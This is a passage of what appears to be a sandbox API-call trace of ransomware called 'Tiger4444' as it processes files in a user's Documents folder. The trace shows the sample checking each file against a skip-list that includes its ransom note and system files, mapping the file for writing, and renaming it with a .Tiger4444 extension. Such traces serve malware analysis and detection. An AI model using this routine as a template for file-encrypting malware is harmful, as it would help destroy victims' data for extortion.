(hObject=0x2c8) returned 1 [0046.520] CloseHandle (hObject=0x260) returned 1 [0046.521] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\fsJ8kTuOCLSl-C_JQct.xlsx.Tiger4444") returned 60 [0046.521] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\fsJ8kTuOCLSl-C_JQct.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fsj8ktuoclsl-c_jqct.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\fsJ8kTuOCLSl-C_JQct.xlsx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\fsj8ktuoclsl-c_jqct.xlsx.tiger4444"), dwFlags=0x1) returned 1 [0046.521] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=40336 | out: Addend=0xc6f980) returned 21263568 [0046.521] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4761 [0046.521] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba495f0, ftCreationTime.dwHighDateTime=0x1d4bdfb, ftLastAccessTime.dwLowDateTime=0x16390070, ftLastAccessTime.dwHighDateTime=0x1d488f0, ftLastWriteTime.dwLowDateTime=0x16390070, ftLastWriteTime.dwHighDateTime=0x1d488f0, nFileSizeHigh=0x0, nFileSizeLow=0x55e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HWI6QLOj9su4aVLe9iXw.xlsx", cAlternateFileName="HWI6QL~1.XLS")) returned 1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="Tiger4444.exe") returned -1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2=".") returned 1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="..") returned 1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="windows") returned -1 [0046.521] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="bootmgr") returned 1 [0046.522] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="pagefile.sys") returned -1 [0046.522] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="boot") returned 1 [0046.522] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="ids.txt") returned -1 [0046.522] lstrcmpiW (lpString1="HWI6QLOj9su4aVLe9iXw.xlsx", lpString2="NTUSER.DAT") returned -1 [0046.522] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HWI6QLOj9su4aVLe9iXw.xlsx" | out: lpString1="HWI6QLOj9su4aVLe9iXw.xlsx") returned="HWI6QLOj9su4aVLe9iXw.xlsx" [0046.522] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HWI6QLOj9su4aVLe9iXw.xlsx", dwFileAttributes=0x0) returned 1 [0046.522] lstrlenW (lpString="HWI6QLOj9su4aVLe9iXw.xlsx") returned 25 [0046.522] lstrlenW (lpString="Tiger4444") returned 9 [0046.522] lstrcmpiW (lpString1="9iXw.xlsx", lpString2="Tiger4444") returned -1 [0046.522] lstrlenW (lpString=".dll") returned 4 [0046.522] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0046.522] lstrlenW (lpString=".lnk") returned 4 [0046.522] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0046.522] lstrlenW (lpString=".ini") returned 4 [0046.522] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0046.522] lstrlenW (lpString=".sys") returned 4 [0046.522] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0046.522] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HWI6QLOj9su4aVLe9iXw.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\hwi6qloj9su4avle9ixw.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.523] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.523] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13797568094) returned 1 [0046.523] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=21989) returned 1 [0046.523] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0046.523] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0046.523] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x58f0, lpName=0x0) returned 0x2c8 [0046.523] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58f0) returned 0xbe0000 [0046.524] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.524] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.524] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.524] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.524] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.525] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13797777637) returned 1 [0046.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0046.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0046.525] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.525] CloseHandle (hObject=0x2c8) returned 1 [0046.525] CloseHandle (hObject=0x260) returned 1 [0046.526] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\HWI6QLOj9su4aVLe9iXw.xlsx.Tiger4444") returned 61 [0046.526] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\HWI6QLOj9su4aVLe9iXw.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\hwi6qloj9su4avle9ixw.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\HWI6QLOj9su4aVLe9iXw.xlsx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\hwi6qloj9su4avle9ixw.xlsx.tiger4444"), dwFlags=0x1) returned 1 [0046.530] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=22000 | out: Addend=0xc6f980) returned 21303904 [0046.530] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4763 [0046.530] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba699110, ftCreationTime.dwHighDateTime=0x1d48db3, ftLastAccessTime.dwLowDateTime=0x52d31cd0, ftLastAccessTime.dwHighDateTime=0x1d4fd82, ftLastWriteTime.dwLowDateTime=0x52d31cd0, ftLastWriteTime.dwHighDateTime=0x1d4fd82, nFileSizeHigh=0x0, nFileSizeLow=0x2f65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IrhwLsePMUurM.docx", cAlternateFileName="IRHWLS~1.DOC")) returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="Tiger4444.exe") returned -1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2=".") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="..") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="windows") returned -1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="bootmgr") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="pagefile.sys") returned -1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="boot") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="ids.txt") returned 1 [0046.530] lstrcmpiW (lpString1="IrhwLsePMUurM.docx", lpString2="NTUSER.DAT") returned -1 [0046.530] lstrcpyW (in: lpString1=0x30aeadc, lpString2="IrhwLsePMUurM.docx" | out: lpString1="IrhwLsePMUurM.docx") returned="IrhwLsePMUurM.docx" [0046.530] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\IrhwLsePMUurM.docx", dwFileAttributes=0x0) returned 1 [0046.530] lstrlenW (lpString="IrhwLsePMUurM.docx") returned 18 [0046.530] lstrlenW (lpString="Tiger4444") returned 9 [0046.530] lstrcmpiW (lpString1="UurM.docx", lpString2="Tiger4444") returned 1 [0046.530] lstrlenW (lpString=".dll") returned 4 [0046.530] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0046.531] lstrlenW (lpString=".lnk") returned 4 [0046.531] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0046.531] lstrlenW (lpString=".ini") returned 4 [0046.531] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0046.531] lstrlenW (lpString=".sys") returned 4 [0046.531] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0046.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\IrhwLsePMUurM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\irhwlsepmuurm.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.531] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.531] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13798399703) returned 1 [0046.531] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=12133) returned 1 [0046.531] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.531] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0046.531] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3270, lpName=0x0) returned 0x2c8 [0046.531] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3270) returned 0xbe0000 [0046.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.532] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.532] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.532] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.533] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13798566099) returned 1 [0046.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0046.533] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.533] CloseHandle (hObject=0x2c8) returned 1 [0046.533] CloseHandle (hObject=0x260) returned 1 [0046.534] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\IrhwLsePMUurM.docx.Tiger4444") returned 54 [0046.534] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\IrhwLsePMUurM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\irhwlsepmuurm.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\IrhwLsePMUurM.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\irhwlsepmuurm.docx.tiger4444"), dwFlags=0x1) returned 1 [0046.534] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=12144 | out: Addend=0xc6f980) returned 21325904 [0046.534] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4765 [0046.534] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e0130, ftCreationTime.dwHighDateTime=0x1d490e5, ftLastAccessTime.dwLowDateTime=0x59922180, ftLastAccessTime.dwHighDateTime=0x1d4a8d0, ftLastWriteTime.dwLowDateTime=0x59922180, ftLastWriteTime.dwHighDateTime=0x1d4a8d0, nFileSizeHigh=0x0, nFileSizeLow=0x1668f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JHU0USB Z-UIYlMKL9Z.pptx", cAlternateFileName="JHU0US~1.PPT")) returned 1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="Tiger4444.exe") returned -1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2=".") returned 1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="..") returned 1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="windows") returned -1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="bootmgr") returned 1 [0046.534] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="pagefile.sys") returned -1 [0046.535] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="boot") returned 1 [0046.535] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="ids.txt") returned 1 [0046.535] lstrcmpiW (lpString1="JHU0USB Z-UIYlMKL9Z.pptx", lpString2="NTUSER.DAT") returned -1 [0046.535] lstrcpyW (in: lpString1=0x30aeadc, lpString2="JHU0USB Z-UIYlMKL9Z.pptx" | out: lpString1="JHU0USB Z-UIYlMKL9Z.pptx") returned="JHU0USB Z-UIYlMKL9Z.pptx" [0046.535] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\JHU0USB Z-UIYlMKL9Z.pptx", dwFileAttributes=0x0) returned 1 [0046.535] lstrlenW (lpString="JHU0USB Z-UIYlMKL9Z.pptx") returned 24 [0046.535] lstrlenW (lpString="Tiger4444") returned 9 [0046.535] lstrcmpiW (lpString1="KL9Z.pptx", lpString2="Tiger4444") returned -1 [0046.535] lstrlenW (lpString=".dll") returned 4 [0046.535] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0046.535] lstrlenW (lpString=".lnk") returned 4 [0046.535] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0046.535] lstrlenW (lpString=".ini") returned 4 [0046.535] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0046.535] lstrlenW (lpString=".sys") returned 4 [0046.535] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0046.535] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\JHU0USB Z-UIYlMKL9Z.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\jhu0usb z-uiylmkl9z.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.535] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.535] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13798843709) returned 1 [0046.535] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=91791) returned 1 [0046.535] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.535] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0046.535] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16990, lpName=0x0) returned 0x2c8 [0046.536] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16990) returned 0xbe0000 [0046.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0046.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0046.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.538] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0046.538] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.538] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0046.538] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13799089935) returned 1 [0046.538] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.538] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0046.538] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.539] CloseHandle (hObject=0x2c8) returned 1 [0046.539] CloseHandle (hObject=0x260) returned 1 [0046.547] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\JHU0USB Z-UIYlMKL9Z.pptx.Tiger4444") returned 60 [0046.547] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\JHU0USB Z-UIYlMKL9Z.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\jhu0usb z-uiylmkl9z.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\JHU0USB Z-UIYlMKL9Z.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\jhu0usb z-uiylmkl9z.pptx.tiger4444"), dwFlags=0x1) returned 1 [0046.548] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=91792 | out: Addend=0xc6f980) returned 21338048 [0046.548] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4766 [0046.548] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97813290, ftCreationTime.dwHighDateTime=0x1d4a42c, ftLastAccessTime.dwLowDateTime=0xa768dd20, ftLastAccessTime.dwHighDateTime=0x1d4c614, ftLastWriteTime.dwLowDateTime=0xa768dd20, ftLastWriteTime.dwHighDateTime=0x1d4c614, nFileSizeHigh=0x0, nFileSizeLow=0x2069, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kJNpSxm0FJ.docx", cAlternateFileName="KJNPSX~1.DOC")) returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="Tiger4444.exe") returned -1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2=".") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="..") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="windows") returned -1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="bootmgr") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="pagefile.sys") returned -1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="boot") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="ids.txt") returned 1 [0046.548] lstrcmpiW (lpString1="kJNpSxm0FJ.docx", lpString2="NTUSER.DAT") returned -1 [0046.548] lstrcpyW (in: lpString1=0x30aeadc, lpString2="kJNpSxm0FJ.docx" | out: lpString1="kJNpSxm0FJ.docx") returned="kJNpSxm0FJ.docx" [0046.548] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kJNpSxm0FJ.docx", dwFileAttributes=0x0) returned 1 [0046.549] lstrlenW (lpString="kJNpSxm0FJ.docx") returned 15 [0046.549] lstrlenW (lpString="Tiger4444") returned 9 [0046.549] lstrcmpiW (lpString1="m0FJ.docx", lpString2="Tiger4444") returned -1 [0046.549] lstrlenW (lpString=".dll") returned 4 [0046.549] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0046.549] lstrlenW (lpString=".lnk") returned 4 [0046.549] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0046.549] lstrlenW (lpString=".ini") returned 4 [0046.549] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0046.549] lstrlenW (lpString=".sys") returned 4 [0046.549] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0046.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kJNpSxm0FJ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\kjnpsxm0fj.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.549] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.549] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13800216054) returned 1 [0046.549] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=8297) returned 1 [0046.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0046.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0046.549] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2370, lpName=0x0) returned 0x2c8 [0046.549] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2370) returned 0xbe0000 [0046.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.550] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13800336983) returned 1 [0046.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0046.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0046.550] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.551] CloseHandle (hObject=0x2c8) returned 1 [0046.551] CloseHandle (hObject=0x260) returned 1 [0046.551] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\kJNpSxm0FJ.docx.Tiger4444") returned 51 [0046.551] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\kJNpSxm0FJ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\kjnpsxm0fj.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\kJNpSxm0FJ.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\kjnpsxm0fj.docx.tiger4444"), dwFlags=0x1) returned 1 [0046.552] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=8304 | out: Addend=0xc6f980) returned 21429840 [0046.552] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4768 [0046.552] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="Tiger4444.exe") returned -1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0046.552] 